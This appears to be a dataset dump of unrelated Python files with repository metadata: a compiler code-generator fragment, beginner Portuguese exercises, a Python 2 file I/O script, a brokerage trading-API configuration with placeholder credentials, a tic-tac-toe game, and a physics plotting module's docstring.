genExpr(tree[0], varStart1)
varStart2 = regs.pop()
genExpr(tree[2], varStart2)
write("\n\tcmp ",varStart1, ", ", varStart2,"\n")
write("\t", getJump(tree[1]), " ")
#Restore the registers used
regs.append(varStart1)
regs.append(varStart2)
#If the expression is of type !=, etc
elif(len(tree)==2 and tree[0] == "!"):
genBoolExpr2(tree[1])
register = regs.pop()
write("\n\tmovzx ",register, ", al\n")
write("not ", register)
write("cmp ", register, ", 1")
write("\n\tjne ")
#Restore the register used
regs.append(register)
else:
genBoolExpr2(tree)
register = regs.pop()
write("\n\tmovzx ",register, ", al\n")
write("cmp ", register, ", 1")
write("\n\tjne ")
#Restore the registers used
regs.append(register)
#IF 1
def genIf(tree):
global regs
global IF_NUMBER
IF_NUMBER += 1
ifNumber = str(IF_NUMBER)
#IF 1
write("\nif", ifNumber, ":\n")
genBoolExpr(tree[2])
#If the condition doesn't hold, JUMP
if(tree[6] == "ENDIF"):
write("endIf", ifNumber, "\n")
else:
innerIf = (IF_NUMBER + 1)
y = str(innerIf)
write("if", y , "\n")
genBlock(tree[5])
#JUMP TO ENDIF 1
write("\n\tjmp endIf", ifNumber)
#Else and else_if
if(tree[6] != "ENDIF"):
genIf2(tree[6:], ifNumber)
#ENDIF
write("\nendIf", ifNumber,":\n" )
##########Auxiliary functions#############
# Auxiliary functions using the global variables, mainly for type checking
# and handling lists
# Gets current scope on stack.
def getAllStack():
st = ""
for s in stack:
st+=s
return st
# Gets the inner most scope a variable is being found in + the variable
# or an empty string if the variable is not in any scope, e.g. global variables
def getScopePlusVar(tree):
global stack
global allocationTable
potentialVarNames = []
aux = list(stack)
#If negative case
if (type(tree) is list and len(tree) > 1):
var = tree[1]
elif (type(tree) is list):
var = tree[0]
else:
var = tree
while (len(stack) > 0):
potentialVarNames.append(getAllStack()+var)
stack.pop()
potentialVarNames.append(var)
stack = list(aux)
# Finds if varname is in any scope of the allocation table
for p in potentialVarNames:
if (p in allocationTable):
return p
return ""
# Gets register associated with a variable in the inner most scope found
def getRegisterInScope(tree):
global allocationTable
if (getScopePlusVar(tree) != ""):
return allocationTable[getScopePlusVar(tree)].__getitem__(0)
return ""
# Cleans extra brackets from lists with one element.
def cleanList(tree):
if (len(tree) == 1 and type(tree[0]) is list):
tree = cleanList(tree[0])
elif (len(tree) > 1 and type(tree) is list):
for i in range (len(tree)):
tree[i] = cleanList(tree[i])
return tree
# Verifies if a tree contains an expression, function call, negation, etc
# or a simple value int/char value like 42 or 'a'
def isValue(tree):
while (type(tree) is list):
if (len(tree) == 1):
tree = tree[0]
else:
break
if (type(tree) is list):
return False
elif (isInteger(tree)):
return True
elif (isChar(tree)):
return True
elif (isString(tree)):
return True
return False
def isChar(tree):
return tree[0] == "\'" and tree[len(tree)-1] == "\'"
def isString(tree):
return tree[0] == "\"" and tree[len(tree)-1] == "\""
def isInteger(tree):
for digit in tree:
if (not (digit.isdigit())):
return False
return True
def cleanToFirstValue(tree):
while (type(tree) is list):
tree = tree[0]
return tree
| 28.897143 | 79 | 0.57109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,830 | 0.238778 |
aa03628128470066c6fb4c6581837b4e0400afec | 990 | py | Python | desafios/desafio059.py | carlosdaniel-cyber/my-python-exercises | 0d6b2874448e0bc1f8c4a5948b0beae56b95ba6b | [
"MIT"
] | null | null | null | desafios/desafio059.py | carlosdaniel-cyber/my-python-exercises | 0d6b2874448e0bc1f8c4a5948b0beae56b95ba6b | [
"MIT"
] | null | null | null | desafios/desafio059.py | carlosdaniel-cyber/my-python-exercises | 0d6b2874448e0bc1f8c4a5948b0beae56b95ba6b | [
"MIT"
] | null | null | null | from time import sleep
n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
op = 0
while op != 5:
print(''' [ 1 ] somar
[ 2 ] multiplicar
[ 3 ] maior
[ 4 ] novos números
[ 5 ] sair do programa''')
op = int(input('>>>>> Qual é a sua opção? '))
if op == 1:
s = n1 + n2
print('A soma entre {} + {} é {}'.format(n1, n2, s))
elif op == 2:
m = n1 * n2
print('O resultado de {} x {} é {}'.format(n1, n2, m))
elif op == 3:
if n1 > n2:
maior = n1
else:
maior = n2
print('Entre {} e {} o maior valor é {}'.format(n1, n2, maior))
elif op == 4:
print('Informe os números novamente: ')
n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
elif op == 5:
print('Finalizando...')
else:
print('Opção inválida. Tente novamente')
print('=-'*20)
sleep(1)
print('Fim do programa! Volte sempre!')
| 28.285714 | 71 | 0.491919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 426 | 0.425574 |
aa04307124ba223bc978e954f54e343c9efb1a6f | 569 | py | Python | curso em video/python/mundo 1/ex033.py | KenzoDezotti/cursoemvideo | 6eba03e67192f7384092192ed2cc1a8e59efd9b9 | [
"MIT"
] | null | null | null | curso em video/python/mundo 1/ex033.py | KenzoDezotti/cursoemvideo | 6eba03e67192f7384092192ed2cc1a8e59efd9b9 | [
"MIT"
] | null | null | null | curso em video/python/mundo 1/ex033.py | KenzoDezotti/cursoemvideo | 6eba03e67192f7384092192ed2cc1a8e59efd9b9 | [
"MIT"
] | null | null | null | c = int(input('digite o primeiro numero: '))
b = int(input('digite o segundo numero: '))
a = int(input('digite o terceiro numero: '))
cores= {'vermelho': '\033[0;31m',
'azul' : '\033[1;34m',
'zero': '\033[m' }
# qual o maior
maior = a
if b > c and b > a:
maior = b
if c > b and c > a:
maior = c
print('O maior valor foi {}{}{}'.format(cores['azul'],maior,cores['zero']))
# qual o menor
menor = c
if a < b and a < c:
menor = a
if b < a and b < c:
menor = b
print('O menor valor foi {}{}{}'.format(cores['vermelho'],menor,cores['zero']))
| 25.863636 | 79 | 0.56239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 245 | 0.43058 |
aa045e92b1da01e687147246d74bf80b0eabb154 | 1,547 | py | Python | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def read_text_file():
# get filename
fname = raw_input('Enter filename: ')
print
# attempt to open file for reading
try:
fobj = open(fname, 'r')
except IOError, e:
print '*** file open error:', e
else:
# display contents to the screen
for eachline in fobj:
print eachline,
fobj.close()
def write_text_file():
import os
ls = os.linesep
fname = ''
# get filename
while True:
fname = raw_input('Input filename: ')
if os.path.exists(fname):
print "ERROR: '%s' already exists" % fname
else:
break
# get file content (text) lines
all_content = []
print "\nEnter lines ('.' by itself quit).\n"
# loop until user terminates input
while True:
entry = raw_input('> ')
if entry == '.':
break
else:
all_content.append(entry)
# write lines to file with proper line-endling
fobj = open(fname, 'w')
fobj.writelines(['%s%s' % (x, ls) for x in all_content])
fobj.close()
print 'DONE!'
if '__main__' == __name__:
item = ''
while True:
print '(1) Write to file'
print '(2) Read from file'
print '(x) Exit'
item = raw_input('> ')
if item == '1':
write_text_file()
elif item == '2':
read_text_file()
elif item == 'x' or item == 'X':
break
else:
continue
| 22.1 | 60 | 0.517776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 479 | 0.309632 |
aa057ded2140561374c7da858671054b70b4655e | 12,212 | py | Python | configs/__init__.py | fswzb/autotrade | e3240dc6d5d81504b3df3be7f0f85000ce5b634d | [
"MIT"
] | 1 | 2020-06-22T06:18:07.000Z | 2020-06-22T06:18:07.000Z | configs/__init__.py | fswzb/autotrade | e3240dc6d5d81504b3df3be7f0f85000ce5b634d | [
"MIT"
] | null | null | null | configs/__init__.py | fswzb/autotrade | e3240dc6d5d81504b3df3be7f0f85000ce5b634d | [
"MIT"
] | 1 | 2019-11-24T18:09:47.000Z | 2019-11-24T18:09:47.000Z | # coding=utf-8
common_mysql_config = {
'user': 'root',
'passwd': '',
'host': '127.0.0.1',
'db': 'autotrade',
'connect_timeout': 3600,
'charset': 'utf8'
}
yongjinbao_config = {"account": "帐号", "password": "加密后的密码"}
guangfa_config = {"username": "加密的客户号", "password": "加密的密码"}
yinghe_config = {"inputaccount": "客户号", "trdpwd": "加密后的密码"}
huatai_config = {"userName": "用户名", "servicePwd": "通讯密码", "trdpwd": "加密后的密码"}
xueqiu_config = {
"username": "邮箱",
"account": "手机号",
"password": "加密后的密码",
"portfolio_code": "组合代码(例:ZH818559)",
"portfolio_market": "交易市场(例:us 或者 cn 或者 hk)"
}
global_config = {
"response_format": {
"int": [
"current_amount", "enable_amount", "entrust_amount", "成交数量",
"撤单数量", "委托数量", "股份可用", "买入冻结", "买出冻结", "当前持仓", "股份余额"
],
"float": [
"current_balance", "enable_balance", "fetch_balance",
"market_value", "asset_balance", "av_buy_price", "cost_price",
"income_balance", "market_value", "entrust_price",
"business_amount", "business_price", "business_balance", "fare1",
"occur_balance", "farex", "fare0", "occur_amount", "post_balance",
"fare2", "fare3", "资金余额", "可用资金", "参考市值", "总资产", "股份参考盈亏", "委托价格",
"参考盈亏", "参考市价", "参考市值"
]
}
}
yjb_config = {
"login_page": "https://jy.yongjinbao.com.cn/winner_gj/gjzq/",
"login_api": "https://jy.yongjinbao.com.cn/winner_gj/gjzq/exchange.action",
"verify_code_api":
"https://jy.yongjinbao.com.cn/winner_gj/gjzq/user/extraCode.jsp",
"prefix":
"https://jy.yongjinbao.com.cn/winner_gj/gjzq/stock/exchange.action",
"logout_api":
"https://jy.yongjinbao.com.cn/winner_gj/gjzq/stock/exchange.action?function_id=20&login_type=stock",
"login": {
"function_id": 200,
"login_type": "stock",
"version": 200,
"identity_type": "",
"remember_me": "",
"input_content": 1,
"content_type": 0,
"loginPasswordType": "B64",
"disk_serial_id": "ST3250820AS",
"cpuid": "-41315-FA76141D",
"machinecode": "-41315-FA76141D"
},
"buy": {
"service_type": "stock",
"request_id": "buystock_302"
},
"sell": {
"service_type": "stock",
"request_id": "sellstock_302"
},
"position": {
"request_id": "mystock_403"
},
"balance": {
"request_id": "mystock_405"
},
"entrust": {
"request_id": "trust_401",
"sort_direction": 1,
"deliver_type": "",
"service_type": "stock"
},
"cancel_entrust": {
"request_id": "chedan_304"
},
"current_deal": {
"request_id": "bargain_402",
"sort_direction": 1,
"service_type": "stock"
},
"ipo_enable_amount": {
"request_id": "buystock_300"
},
"exchangetype4stock": {
"service_type": "stock",
"function_id": "105"
},
"account4stock": {
"service_type": "stock",
"function_id": "407",
"window_id": "StockMarketTrade"
}
}
yh_config = {
"login_page": "https://www.chinastock.com.cn/trade/webtrade/login.jsp",
"login_api":
"https://www.chinastock.com.cn/trade/LoginServlet?ajaxFlag=mainlogin",
"heart_beat":
"https://www.chinastock.com.cn/trade/AjaxServlet?ajaxFlag=heartbeat",
"unlock":
"https://www.chinastock.com.cn/trade/AjaxServlet?ajaxFlag=unlockscreen",
"trade_api": "https://www.chinastock.com.cn/trade/AjaxServlet",
"trade_info_page":
"https://www.chinastock.com.cn/trade/webtrade/tradeindex.jsp",
"verify_code_api":
"https://www.chinastock.com.cn/trade/webtrade/verifyCodeImage.jsp",
"prefix": "https://www.chinastock.com.cn",
"logout_api":
"https://www.chinastock.com.cn/trade/webtrade/commons/keepalive.jsp?type=go",
"login": {
"logintype_rzrq": 0,
"orgid": "",
"inputtype": "C",
"identifytype": 0,
"isonlytrade": 1,
"trdpwdjtws": "",
"Authplain9320": "",
"Authsign9321": "",
"certdata9322": "",
"ftype": "bsn"
},
"position": {
"service_jsp": "/trade/webtrade/stock/stock_zjgf_query.jsp",
"service_type": 1
},
"balance": {
"service_jsp": "/trade/webtrade/stock/stock_zjgf_query.jsp",
"service_type": 2
},
"entrust": {
"service_jsp": "/trade/webtrade/stock/stock_wt_query.jsp"
},
"buy": {
"marktype": "",
"ajaxFlag": "wt"
},
"sell": {
"ajaxFlag": "wt"
},
"fundpurchase": {
"ajaxFlag": "wt",
"bsflag": 3
},
"fundredemption": {
"ajaxFlag": "wt",
"bsflag": 4
},
"fundsubscribe": {
"ajaxFlag": "wt",
"bsflag": 5
},
"fundsplit": {
"ajaxFlag": "wt",
"bsflag": 85
},
"fundmerge": {
"ajaxFlag": "wt",
"bsflag": 86
},
"cancel_entrust": {
"ajaxFlag": "stock_cancel"
},
"current_deal": {
"service_jsp": "/trade/webtrade/stock/stock_cj_query.jsp"
},
"account4stock": {
"service_jsp": "/trade/webtrade/zhgl/holderQuery.jsp"
}
}
xq_config = {
"login_api": "https://xueqiu.com/user/login",
"prefix": "https://xueqiu.com/user/login",
"portfolio_url": "https://xueqiu.com/p/",
"search_stock_url": "https://xueqiu.com/stock/p/search.json",
"rebalance_url": "https://xueqiu.com/cubes/rebalancing/create.json",
"history_url": "https://xueqiu.com/cubes/rebalancing/history.json",
"referer": "https://xueqiu.com/p/update?action=holdings&symbol=%s"
}
ht_config = {
"login_page": "https://service.htsc.com.cn/service/login.jsp",
"login_api":
"https://service.htsc.com.cn/service/loginAction.do?method=login",
"trade_info_page":
"https://service.htsc.com.cn/service/flashbusiness_new3.jsp?etfCode=",
"verify_code_api":
"https://service.htsc.com.cn/service/pic/verifyCodeImage.jsp",
"prefix": "https://tradegw.htsc.com.cn",
"logout_api": "https://service.htsc.com.cn/service/login.jsp?logout=yes",
"login": {
"loginEvent": 1,
"topath": "null",
"accountType": 1,
"userType": "jy",
"hddInfo": "ST3250820AS"
},
"position": {
"cssweb_type": "GET_STOCK_POSITION",
"function_id": 403,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"query_mode": 0,
"request_num": 100,
"position_str": ""
},
"balance": {
"cssweb_type": "GET_FUNDS",
"function_id": 405,
"identity_type": "",
"money_type": ""
},
"entrust": {
"cssweb_type": "GET_CANCEL_LIST",
"function_id": 401,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"sort_direction": 0,
"request_num": 100,
"position_str": ""
},
"buy": {
"cssweb_type": "STOCK_BUY",
"function_id": 302,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"sort_direction": 0,
"request_num": 100,
"identity_type": "",
"entrust_bs": 1
},
"sell": {
"cssweb_type": "STOCK_SALE",
"function_id": 302,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"sort_direction": 0,
"request_num": 100,
"identity_type": "",
"entrust_bs": 2
},
"cancel_entrust": {
"cssweb_type": "STOCK_CANCEL",
"function_id": 304,
"exchange_type": "",
"stock_code": "",
"identity_type": "",
"entrust_bs": 2,
"batch_flag": 0
},
"exchangebill": {
"cssweb_type": "GET_EXCHANGEBILL",
"request_num": 100,
"end_date": "",
"start_date": "",
"exchange_type": "",
"stock_code": "",
"deliver_type": 1,
"query_direction": "",
"function_id": 308,
"stock_account": "",
"position_str": ""
}
}
gf_config = {
"login_api": "https://trade.gf.com.cn/login",
"login_page": "https://trade.gf.com.cn/",
"verify_code_api": "https://trade.gf.com.cn/yzm.jpgx",
"prefix": "https://trade.gf.com.cn/entry",
"logout_api": "https://trade.gf.com.cn/entry",
"login": {
"authtype": 2,
"disknum": "1SVEYNFA915146",
"loginType": 2,
"origin": "web"
},
"balance": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryAssert"
},
"position": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryCC",
"request_num": 500,
"start": 0,
"limit": 10
},
"entrust": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryDRWT",
"action_in": 1,
"request_num": 100,
"query_direction": 0,
"start": 0,
"limit": 10
},
"cancel_entrust": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "cancel",
"exchange_type": 1,
"batch_flag": 0
},
"accountinfo": {
"classname": "com.gf.etrade.control.FrameWorkControl",
"method": "getMainJS"
},
"buy": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "entrust",
"entrust_bs": 1
},
"sell": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "entrust",
"entrust_bs": 2
},
"cnjj_apply": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "CNJJSS",
"entrust_bs": 1
},
"cnjj_redeem": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "CNJJSS",
"entrust_bs": 2
},
"fundsubscribe": {
"classname": "com.gf.etrade.control.SHLOFFundControl",
"method": "assetSecuprtTrade",
"entrust_bs": 1
},
"fundpurchase": {
"classname": "com.gf.etrade.control.SHLOFFundControl",
"method": "assetSecuprtTrade",
"entrust_bs": 1
},
"fundredemption": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "doDZJYEntrust",
"entrust_bs": 2
},
"fundmerge": {
"classname": "com.gf.etrade.control.SHLOFFundControl",
"method": "assetSecuprtTrade",
"entrust_bs": ""
},
"fundsplit": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "doDZJYEntrust",
"entrust_bs": ""
},
"nxbQueryPrice": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryPrice"
},
"nxbentrust": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbentrust"
},
"nxbQueryDeliver": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryDeliver"
},
"nxbQueryHisDeliver": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryHisDeliver"
},
"nxbQueryEntrust": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryEntrust"
},
"queryOfStkCodes": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "queryOfStkCodes"
},
"queryNXBOfStock": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "queryNXBOfStock"
},
"nxbentrustcancel": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbentrustcancel"
},
"exchangebill": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryDeliver",
"request_num": 50,
"query_direction": 0,
"start_date": "",
"end_date": "",
"deliver_type": 1
},
"queryStockInfo": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "getStockHQ"
}
}
| 28.869976 | 104 | 0.546921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,231 | 0.65943 |
aa05a5f5d054582877f87be6fff364e1313a693c | 8,894 | py | Python | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | 1 | 2016-09-08T02:32:00.000Z | 2016-09-08T02:32:00.000Z | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
'''
PyTicTacToe - Tic Tac Toe in Python
http://ruel.me
Copyright (c) 2010, Ruel Pagayon - ruel@ruel.me
All rights reserved.
Redistribution and use in source and binary forms, with or without
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of ruel.me nor the names of its contributors
may be used to endorse or promote products derived from this
script without specific prior written permission.
THIS SCRIPT IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL RUEL PAGAYON BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SCRIPT, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
General Description: The CPU difficulty is Human-Like. Means, you can still WIN!
I made it so, because I do not want this to be boring, and
end up with loses and draws.
'''
import os, random, time, operator
'''
Classes
'''
class Player:
'''
Class for players (user and cpu)
'''
def __init__(self, name, weapon):
self.name = name
self.weapon = weapon
self.moves = 0
self.first = False
self.won = False
class BoardCell:
'''
Class for the cells
'''
def __init__(self, number):
self.number = number
self.empty = True
self.content = ' '
def main():
'''
Main Program Flow
'''
recorduser, recordcpu, recorddraw = 0, 0, 0
while True:
# Toss the coin!
won = cointoss()
if won:
user = Player('User', 'X')
cpu = Player('CPU', 'O')
user.first = True
else:
user = Player('User', 'O')
cpu = Player('CPU', 'X')
cpu.first = True
print user.name if user.first else cpu.name, 'goes first.'
# Timeout 5 seconds
print 'Clearing screen in 3 seconds (Get Ready!)'
time.sleep(3)
# Let the game begin
tgame(user, cpu)
# Show the winner
if user.won:
recorduser += 1
winner = user
elif cpu.won:
recordcpu += 1
winner = cpu
else:
recorddraw += 1
winner = Player('DRAW', '-')
print '\nWINNER:', winner.name, '(' + winner.weapon + ')'
print 'Moves:', winner.moves
# Record
print '\nRecord:\tUser:', recorduser, '\n\tCPU:', recordcpu, '\n\tDRAW:', recorddraw
# Play Again?
while True:
choice = raw_input('\nPlay again? [Y]es or [N]o: ')
if choice == 'Y' or choice == 'N':
break
# If yes, clear the screen, else break the loop
if choice == 'Y':
cls()
else:
break
# Print empty space
print
'''
Sub function section
'''
def cointoss():
'''
Coin Toss sub function
'''
won = False
while True:
choice = raw_input('Heads or Tails (H or T): ')
if choice == 'H' or choice == 'T':
print 'Tossing Coin..'
coin = ['Heads', 'Tails'][random.randrange(0, 2)]
print '\n -- ', coin , ' -- \n'
if coin[0] == choice:
won = True
break
return won
def cls():
'''
Clear the screen (works for Windows and UNIX.. so far)
'''
os.system('cls' if os.name == 'nt' else 'clear')
def drawboard(board):
'''
Draw the board for the game
'''
cls()
boardstr = ''
print boardstr + '\n'
i = 0
for row in board:
boardstr += '\t'
if i == 0:
boardstr += ' | | \n\t'
boardstr += ' {0} | {1} | {2}\n'.format(*[cell.content for cell in row])
if i != 2:
boardstr += '\t | | \n\t------|-------|------\n\t | | \n'
else:
boardstr += '\t | | \n'
i += 1
print boardstr
def boardinit():
'''
Initialize the cells on the board
'''
return [[BoardCell((i + 1) + (j * 3)) for i in range(3)] for j in range(3)]
def bdraw(number, board, player):
'''
Draw the letter ('X' or 'O') to the board
'''
for i in range(3):
for j in range(3):
if board[i][j].number == number:
if board[i][j].empty:
board[i][j].content = player.weapon
board[i][j].empty = False
return True
return False
def usermove(user, board):
'''
User's turn
'''
user.moves += 1
while True:
number = 0
try:
number = int(raw_input('Your turn [1-9]: '))
except:
print 'Invalid input'
if number >= 1 and number <= 9:
if bdraw(number, board, user):
break
def cpumove(cpu, user, board):
'''
CPU's turn
'''
cpu.moves += 1
number = getwnumber(board, cpu.weapon)
if number == -2:
number = getwnumber(board, user.weapon)
while True:
if number <= 0:
number = random.randrange(1, 10)
if bdraw(number, board, cpu):
break
number = -1
def getboard(board, weapon):
'''
Get the board contents
'''
xo = []
for i in range(3):
for j in range(3):
if not board[i][j].empty:
if weapon == 'T':
xo.append(board[i][j].number)
else:
if board[i][j].content == weapon:
xo.append(board[i][j].number)
return xo
def getwnumber(board, weapon):
'''
Check if there's a winning/breaking cell
'''
number = -2
t = getboard(board, weapon)
ex = getboard(board, 'T')
# Line 1 of 8
if isin(1, t) and isin(2, t) and not isin(3, ex):
number = 3
elif isin(2, t) and isin(3, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(3, t) and not isin(2, ex):
number = 2
# Line 2 of 8
elif isin(4, t) and isin(5, t) and not isin(6, ex):
number = 6
elif isin(5, t) and isin(6, t) and not isin(4, ex):
number = 4
elif isin(4, t) and isin(6, t) and not isin(5, ex):
number = 5
# Line 3 of 8
elif isin(7, t) and isin(8, t) and not isin(9, ex):
number = 9
elif isin(8, t) and isin(9, t) and not isin(7, ex):
number = 7
elif isin(7, t) and isin(9, t) and not isin(8, ex):
number = 8
# Line 4 of 8
elif isin(1, t) and isin(5, t) and not isin(9, ex):
number = 9
elif isin(5, t) and isin(9, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(9, t) and not isin(5, ex):
number = 5
# Line 5 of 8
elif isin(3, t) and isin(5, t) and not isin(7, ex):
number = 7
elif isin(5, t) and isin(7, t) and not isin(3, ex):
number = 3
elif isin(3, t) and isin(7, t) and not isin(5, ex):
number = 5
# Line 6 of 8
elif isin(1, t) and isin(4, t) and not isin(7, ex):
number = 7
elif isin(4, t) and isin(7, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(7, t) and not isin(4, ex):
number = 4
# Line 7 of 8
elif isin(2, t) and isin(5, t) and not isin(8, ex):
number = 8
elif isin(5, t) and isin(8, t) and not isin(2, ex):
number = 2
elif isin(2, t) and isin(8, t) and not isin(5, ex):
number = 5
# Line 8 of 8
elif isin(3, t) and isin(6, t) and not isin(9, ex):
number = 9
elif isin(6, t) and isin(9, t) and not isin(3, ex):
number = 3
elif isin(3, t) and isin(9, t) and not isin(6, ex):
number = 6
return number
def isin(val, list):
'''
Checking if a value exists in a list
'''
return val in list
def checknumber(xo):
'''Internal number checking. To prevent, messy code (sort of)'''
if isin(1, xo) and isin(2, xo) and isin(3, xo) or \
isin(4, xo) and isin(5, xo) and isin(6, xo) or \
isin(7, xo) and isin(8, xo) and isin(9, xo) or \
isin(1, xo) and isin(5, xo) and isin(9, xo) or \
isin(3, xo) and isin(5, xo) and isin(7, xo) or \
isin(1, xo) and isin(4, xo) and isin(7, xo) or \
isin(2, xo) and isin(5, xo) and isin(8, xo) or \
isin(3, xo) and isin(6, xo) and isin(9, xo):
return True
return False
def checkwin(board, weapon):
'''
Check if someone won already
'''
xo = getboard(board, weapon)
if checknumber(xo):
return True
return False
def checktie(board):
'''
Check if it's a draw
'''
t = getboard(board, 'T')
if len(t) == 9:
return True
return False
def tgame(user, cpu):
'''Main Game function'''
board = boardinit()
drawboard(board)
if cpu.first:
cpumove(cpu, user, board)
drawboard(board)
while True:
usermove(user, board)
drawboard(board)
if checkwin(board, user.weapon):
user.won = True
break
if checktie(board):
break
cpumove(cpu, user, board)
drawboard(board)
if checkwin(board, cpu.weapon):
cpu.won = True
break
if checktie(board):
break
'''
Lines below is the entry point of the script
'''
if __name__ == '__main__':
main()
'''End of Code'''
| 22.688776 | 92 | 0.616483 | 333 | 0.037441 | 0 | 0 | 0 | 0 | 0 | 0 | 3,243 | 0.364628 |
aa062c465b8cb43f800d6ab5306626908026dc9e | 22,484 | py | Python | plot/comparison.py | yketa/UBC---Spring-2018---code | b065544639a483dda48cda89bcbb11c1772232aa | [
"MIT"
] | 1 | 2021-12-15T13:38:13.000Z | 2021-12-15T13:38:13.000Z | plot/comparison.py | yketa/UBC---Spring-2018---code | b065544639a483dda48cda89bcbb11c1772232aa | [
"MIT"
] | 1 | 2019-05-25T20:00:17.000Z | 2019-05-25T20:00:17.000Z | plot/comparison.py | yketa/UBC---Spring-2018---code | b065544639a483dda48cda89bcbb11c1772232aa | [
"MIT"
] | 1 | 2020-01-22T17:05:18.000Z | 2020-01-22T17:05:18.000Z | """
Module comparison superimposes most probable local density, maximum
cooperativity, time of maximum cooperativity and ratio of transversal and
longitudinal correlations at time of maximum cooperativity, as functions of
the Péclet number, for different trajectories in the phase diagram (either
varying persistence time at fixed self-propelling velocity or varying
self-propelling velocity at fixed persistence time).
Simulation directories must follow the active_particles.naming.AHB2D naming
standard and input files in simulation directories must follow the
active_particles.naming.VarN standard (local densities) and either the
active_particles.naming.Cuu standard (for cooperativities from displacement
correlations), or active_particles.naming.Cww standard (for cooperativities
from displacement relative to centre of mass displacement correlations), or
active_particles.naming.Cdd standard (for cooperativities from displacement
norm correlations), or active_particles.naming.Cee (for cooperativities from
displacement direction correlations).
Environment modes
-----------------
CORRELATION : string
Correlations from which to calculate cooperativities and extract
longitudinal and transversal components.
_____________________________________________________________
| Mode | Correlations |
|______|______________________________________________________|
| Cuu | displacement |
|______|______________________________________________________|
| Cww | displacement relative to centre of mass displacement |
|______|______________________________________________________|
| Cdd | displacement norm |
|______|______________________________________________________|
| Cee | displacement direction |
|______|______________________________________________________|
DEFAULT: Cuu
DRDT : bool
Use the product of the rotation diffusion constant and lag time rather
than the bare lag time.
DEFAULT: True
SHOW : bool
Show comparison plot.
DEFAULT: True
Environment parameters
----------------------
DATA_DIRECTORY : string
Data directory.
DEFAULT: active_particles.naming.sim_directory
EXCLUDE : string
Simulation directories in DATA_DIRECTORY to exclude from the plots.
DEFAULT:
PARAMETERS_FILE : string
Simulation parameters file name.
DEFAULT: active_particles.naming.parameters_file
IMAGE_NAME : string
Default image file name.
DEFAULT: active_particles.plot.comparison._image_name
N : int
Number of particles.
DEFAULT: active_particles.plot.comparison._N
VARIABLES (mandatory) : string separated by ':'
Trajectory variable in order of trajectory.
_______________________________________
| Mode | Variable |
|_________|_____________________________|
| 'dr' | Rotation diffusion constant |
|_________|_____________________________|
| 'vzero' | self-propelling velocity |
|_________|_____________________________|
VAR_MIN (mandatory) : float separated by ':'
Minimum value of trajectory variable in order of trajectory.
VAR_MAX (mandatory) : float separated by ':'
Maximum value of trajectory variable in order of trajectory.
VAR_C (mandatory) : float separated by ':'
